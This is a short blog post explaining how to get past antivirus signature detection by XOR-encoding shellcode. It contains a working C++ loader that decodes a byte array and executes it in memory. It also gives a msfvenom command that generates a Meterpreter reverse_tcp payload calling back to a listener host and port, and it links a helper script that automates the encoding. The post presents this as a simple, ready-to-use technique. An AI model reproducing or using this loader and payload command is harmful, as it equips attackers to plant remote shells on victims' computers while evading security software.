So the other day I was messing about and stumbled across this link Bypassing AV with 10 lines The author does a really good job and I suggest reading it. Basically to sum it up If you generate shellcode you can XOR it with a random key and then compile and you wont get flagged. That's not to say the heuristics wont pick you up, but the signatures sure wont! Anyways the compile code looks something like this.
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {char b[] = {0x34,0xa8,0x47 --SNIP--};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 0x89 ;}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void(*)())exec)();
}
It works great, and all we have to do is xor our code, format it properly and put it in there. If you read my last post youll realize that xor'ing is super super simple. But I decided to whip up a little script so I could do it on the fly.
You can find it here https://github.com/trump0dump/helpful/blob/master/xor_shellcode.py its really very simple.
You start by generating your shellcode with something like so.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f hex > shell_code
That will output into a file formatted like this.
bd21ce1d21ddc2d9 --SNIP-- 59b7683
We then read that file, xor each byte format it and output it into our file to be compiled.
Simple, Sweet, and Easy.
No comments:
Post a Comment